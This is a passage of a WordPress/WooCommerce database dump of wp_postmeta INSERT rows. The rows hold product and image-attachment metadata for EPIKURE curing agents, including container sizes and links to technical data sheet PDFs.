INSERT INTO `wp_postmeta` VALUES (13137, 1166, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13138, 1166, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13139, 1166, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13140, 1166, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13141, 1166, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13142, 1166, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13143, 1166, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13144, 1166, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13145, 1166, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13146, 1166, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13147, 1166, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13148, 1166, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13149, 1166, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (13150, 1166, '_ywtm_title_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (13151, 1166, '_ywtm_content_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (13152, 1166, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13153, 1166, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13154, 1166, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13155, 1166, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13156, 1166, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13157, 1168, '_edit_lock', '1474652431:3'); 
INSERT INTO `wp_postmeta` VALUES (13158, 1168, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13159, 1169, '_wp_attached_file', '2016/09/3055.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13160, 1168, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13161, 1168, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13162, 1168, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13163, 1168, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13164, 1168, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13165, 1168, '318_custom_list_file', 'a:2:{s:32:"a46b5ccf9d63fbd59aca5d1c4ba04bbb";a:3:{s:4:"name";s:12:"EPIKURE 3055";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3055.pdf";s:4:"desc";s:16:"EPIKURE 3055 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13166, 1168, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13167, 1168, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13168, 1168, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13169, 1168, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13170, 1168, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13171, 1168, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13172, 1168, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13173, 1168, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13174, 1168, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13175, 1168, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13176, 1168, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13177, 1168, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13178, 1168, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13179, 1168, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13180, 1168, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13181, 1168, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13182, 1168, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13183, 1168, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13184, 1168, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13185, 1168, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13186, 1168, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13187, 1168, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13188, 1168, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13189, 1168, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13190, 1168, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13191, 1168, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13192, 1168, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13193, 1168, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13194, 1168, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13195, 1168, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13196, 1166, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13197, 1172, '_wp_attached_file', '2016/08/IMG_12651.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13198, 1172, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/IMG_12651.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"IMG_12651-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"IMG_12651-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"IMG_12651-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"IMG_12651-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"IMG_12651-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"IMG_12651-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"IMG_12651-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"IMG_12651-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13199, 1173, '_wp_attached_file', '2016/08/IMG_12641.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13200, 1173, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/IMG_12641.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"IMG_12641-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"IMG_12641-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"IMG_12641-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"IMG_12641-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"IMG_12641-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"IMG_12641-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"IMG_12641-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"IMG_12641-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13201, 1174, '_wp_attached_file', '2016/08/IMG_12631.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13202, 1174, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/IMG_12631.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"IMG_12631-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"IMG_12631-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"IMG_12631-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"IMG_12631-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"IMG_12631-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"IMG_12631-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"IMG_12631-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"IMG_12631-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13203, 1175, '_wp_attached_file', '2016/08/IMG_12621.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13204, 1175, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/IMG_12621.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"IMG_12621-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"IMG_12621-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"IMG_12621-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"IMG_12621-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"IMG_12621-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"IMG_12621-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"IMG_12621-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"IMG_12621-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13205, 1176, '_wp_attached_file', '2016/08/IMG_12591.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13206, 1176, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/IMG_12591.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"IMG_12591-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"IMG_12591-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"IMG_12591-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"IMG_12591-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"IMG_12591-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"IMG_12591-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"IMG_12591-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"IMG_12591-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13207, 1177, '_wp_attached_file', '2016/08/IMG_12561-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13208, 1177, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:23:"2016/08/IMG_12561-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"IMG_12561-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"IMG_12561-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"IMG_12561-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"IMG_12561-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"IMG_12561-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"IMG_12561-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"IMG_12561-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"IMG_12561-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13209, 1178, '_edit_lock', '1474651469:3'); 
INSERT INTO `wp_postmeta` VALUES (13210, 1178, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13211, 1179, '_wp_attached_file', '2016/09/KRYTOX-BANNER-e1472821975779.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13212, 1179, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:40:"2016/09/KRYTOX-BANNER-e1472821975779.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"KRYTOX-BANNER-e1472821975779-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"KRYTOX-BANNER-e1472821975779-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"KRYTOX-BANNER-e1472821975779-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"KRYTOX-BANNER-e1472821975779-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"KRYTOX-BANNER-e1472821975779-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"KRYTOX-BANNER-e1472821975779-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"KRYTOX-BANNER-e1472821975779-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13213, 1179, '_edit_lock', '1472821848:2'); 
INSERT INTO `wp_postmeta` VALUES (13214, 1179, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:17:"KRYTOX-BANNER.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:24:"KRYTOX-BANNER-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:24:"KRYTOX-BANNER-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:24:"KRYTOX-BANNER-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:24:"KRYTOX-BANNER-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:24:"KRYTOX-BANNER-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:24:"KRYTOX-BANNER-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13215, 1179, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13216, 1180, '_wp_attached_file', '2016/09/3155.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13217, 1178, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13218, 1178, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13219, 1178, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13220, 1178, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13221, 1178, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13222, 1178, '318_custom_list_file', 'a:2:{s:32:"f52b130f21808b272fc1e1bb5e39f304";a:3:{s:4:"name";s:12:"EPIKURE 3155";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3155.pdf";s:4:"desc";s:16:"EPIKURE 3155 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13223, 1178, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13224, 1178, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13225, 1178, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13226, 1178, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13227, 1178, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13228, 1178, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13229, 1178, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13230, 1178, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13231, 1178, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13232, 1178, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13233, 1178, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13234, 1178, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13235, 1178, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13236, 1178, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13237, 1178, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13238, 1178, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13239, 1178, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13240, 1178, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13241, 1178, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13242, 1178, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13243, 1178, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13244, 1178, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13245, 1178, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13246, 1178, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13247, 1178, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13248, 1178, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13249, 1178, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13250, 1178, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13251, 1178, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13252, 1178, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13253, 1181, '_edit_lock', '1474651461:3'); 
INSERT INTO `wp_postmeta` VALUES (13254, 1181, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13255, 1182, '_wp_attached_file', '2016/09/3164.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13256, 1181, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13257, 1181, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13258, 1181, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13259, 1181, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13260, 1181, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13261, 1181, '318_custom_list_file', 'a:2:{s:32:"f7e83cd8507af04c38e7814fc043d15a";a:3:{s:4:"name";s:12:"EPIKURE 3164";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3164.pdf";s:4:"desc";s:16:"EPIKURE 3164 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13262, 1181, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13263, 1181, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13264, 1181, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13265, 1181, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13266, 1181, '_virtual', 'no'); 
